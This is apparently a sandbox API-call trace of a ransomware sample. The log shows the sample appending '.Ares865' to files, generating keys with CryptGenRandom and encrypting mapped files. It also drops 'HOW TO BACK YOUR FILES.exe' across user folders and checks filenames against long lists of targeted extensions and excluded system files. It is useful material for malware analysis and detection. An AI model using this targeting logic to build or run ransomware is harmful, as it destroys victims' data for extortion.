lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0065.545] lstrlenW (lpString="wdb") returned 3 [0065.546] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0065.546] lstrlenW (lpString="wmdb") returned 4 [0065.546] lstrcmpiW (lpString1="d-ms", lpString2="wmdb") returned -1 [0065.546] lstrlenW (lpString="wrk") returned 3 [0065.546] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0065.546] lstrlenW (lpString="xdb") returned 3 [0065.546] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0065.546] lstrlenW (lpString="xld") returned 3 [0065.546] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0065.546] lstrlenW (lpString="xmlff") returned 5 [0065.546] lstrcmpiW (lpString1="ed-ms", lpString2="xmlff") returned -1 [0065.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865") returned 97 [0065.546] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.ares865"), dwFlags=0x1) returned 1 [0065.547] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.547] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0065.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.547] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.548] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.548] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.548] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7300, lpName=0x0) returned 0x118 [0065.551] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7300) returned 0x190000 [0065.553] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.553] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.553] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.554] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.554] CloseHandle (hObject=0x118) returned 1 [0065.554] CloseHandle (hObject=0x164) returned 1 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.555] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 0 [0065.555] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.555] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0065.555] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" [0065.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0065.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.555] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned 58 [0065.555] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" [0065.555] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.555] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.556] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.556] GetLastError () returned 0x0 [0065.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.556] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.556] CloseHandle (hObject=0x12c) returned 1 [0065.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.556] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.556] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.556] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.556] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.557] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.557] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.557] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.557] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.557] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.557] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.557] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.557] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0065.557] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History") returned="C:\\Users\\Default User\\Local Settings\\History" [0065.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0065.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0065.557] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History") returned 44 [0065.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History") returned="C:\\Users\\Default User\\Local Settings\\History" [0065.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.557] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.558] GetLastError () returned 0x0 [0065.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.558] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.558] CloseHandle (hObject=0x12c) returned 1 [0065.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.558] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.558] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.558] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.558] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.558] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.558] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.559] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.559] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.559] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.559] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.559] lstrlenW (lpString="desktop.ini") returned 11 [0065.559] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\*") returned 46 [0065.559] lstrcpyW (in: lpString1=0x2cce45a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.559] lstrlenW (lpString="desktop.ini") returned 11 [0065.559] lstrlenW (lpString="Ares865") returned 7 [0065.559] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.559] lstrlenW (lpString=".dll") returned 4 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.559] lstrlenW (lpString=".lnk") returned 4 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.559] lstrlenW (lpString=".ini") returned 4 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.559] lstrlenW (lpString=".sys") returned 4 [0065.559] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.559] lstrlenW (lpString="desktop.ini") returned 11 [0065.559] lstrlenW (lpString="bak") returned 3 [0065.559] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.559] lstrlenW (lpString="ba_") returned 3 [0065.559] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.559] lstrlenW (lpString="dbb") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.560] lstrlenW (lpString="vmdk") returned 4 [0065.560] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.560] lstrlenW (lpString="rar") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.560] lstrlenW (lpString="zip") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.560] lstrlenW (lpString="tgz") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.560] lstrlenW (lpString="vbox") returned 4 [0065.560] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.560] lstrlenW (lpString="vdi") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.560] lstrlenW (lpString="vhd") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.560] lstrlenW (lpString="vhdx") returned 4 [0065.560] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.560] lstrlenW (lpString="avhd") returned 4 [0065.560] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.560] lstrlenW (lpString="db") returned 2 [0065.560] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.560] lstrlenW (lpString="db2") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.560] lstrlenW (lpString="db3") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.560] lstrlenW (lpString="dbf") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.560] lstrlenW (lpString="mdf") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.560] lstrlenW (lpString="mdb") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.560] lstrlenW (lpString="sql") returned 3 [0065.560] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.560] lstrlenW (lpString="sqlite") returned 6 [0065.560] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.560] lstrlenW (lpString="sqlite3") returned 7 [0065.560] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.560] lstrlenW (lpString="sqlitedb") returned 8 [0065.561] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.561] lstrlenW (lpString="xml") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.561] lstrlenW (lpString="$er") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.561] lstrlenW (lpString="4dd") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.561] lstrlenW (lpString="4dl") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.561] lstrlenW (lpString="^^^") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.561] lstrlenW (lpString="abs") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.561] lstrlenW (lpString="abx") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.561] lstrlenW (lpString="accdb") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.561] lstrlenW (lpString="accdc") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.561] lstrlenW (lpString="accde") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.561] lstrlenW (lpString="accdr") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.561] lstrlenW (lpString="accdt") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.561] lstrlenW (lpString="accdw") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.561] lstrlenW (lpString="accft") returned 5 [0065.561] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.561] lstrlenW (lpString="adb") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.561] lstrlenW (lpString="adb") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.561] lstrlenW (lpString="ade") returned 3 [0065.561] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.561] lstrlenW (lpString="adf") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.562] lstrlenW (lpString="adn") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.562] lstrlenW (lpString="adp") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.562] lstrlenW (lpString="alf") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.562] lstrlenW (lpString="ask") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.562] lstrlenW (lpString="btr") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.562] lstrlenW (lpString="cat") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.562] lstrlenW (lpString="cdb") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.562] lstrlenW (lpString="ckp") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.562] lstrlenW (lpString="cma") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.562] lstrlenW (lpString="cpd") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.562] lstrlenW (lpString="dacpac") returned 6 [0065.562] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.562] lstrlenW (lpString="dad") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.562] lstrlenW (lpString="dadiagrams") returned 10 [0065.562] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.562] lstrlenW (lpString="daschema") returned 8 [0065.562] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.562] lstrlenW (lpString="db-journal") returned 10 [0065.562] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.562] lstrlenW (lpString="db-shm") returned 6 [0065.562] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.562] lstrlenW (lpString="db-wal") returned 6 [0065.562] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.562] lstrlenW (lpString="dbc") returned 3 [0065.562] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.562] lstrlenW (lpString="dbs") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.563] lstrlenW (lpString="dbt") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.563] lstrlenW (lpString="dbv") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.563] lstrlenW (lpString="dbx") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.563] lstrlenW (lpString="dcb") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.563] lstrlenW (lpString="dct") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.563] lstrlenW (lpString="dcx") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.563] lstrlenW (lpString="ddl") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.563] lstrlenW (lpString="dlis") returned 4 [0065.563] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.563] lstrlenW (lpString="dp1") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.563] lstrlenW (lpString="dqy") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.563] lstrlenW (lpString="dsk") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.563] lstrlenW (lpString="dsn") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.563] lstrlenW (lpString="dtsx") returned 4 [0065.563] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.563] lstrlenW (lpString="dxl") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.563] lstrlenW (lpString="eco") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.563] lstrlenW (lpString="ecx") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.563] lstrlenW (lpString="edb") returned 3 [0065.563] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.563] lstrlenW (lpString="epim") returned 4 [0065.563] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.563] lstrlenW (lpString="fcd") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.564] lstrlenW (lpString="fdb") returned 3 [0065.564] 